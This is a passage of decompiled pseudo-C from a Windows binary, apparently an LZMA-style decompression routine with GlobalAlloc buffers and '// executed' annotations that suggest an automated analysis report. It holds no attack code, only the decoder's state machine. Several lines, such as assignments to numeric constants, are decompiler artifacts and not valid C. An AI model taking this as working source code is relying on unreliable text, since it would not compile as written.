								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
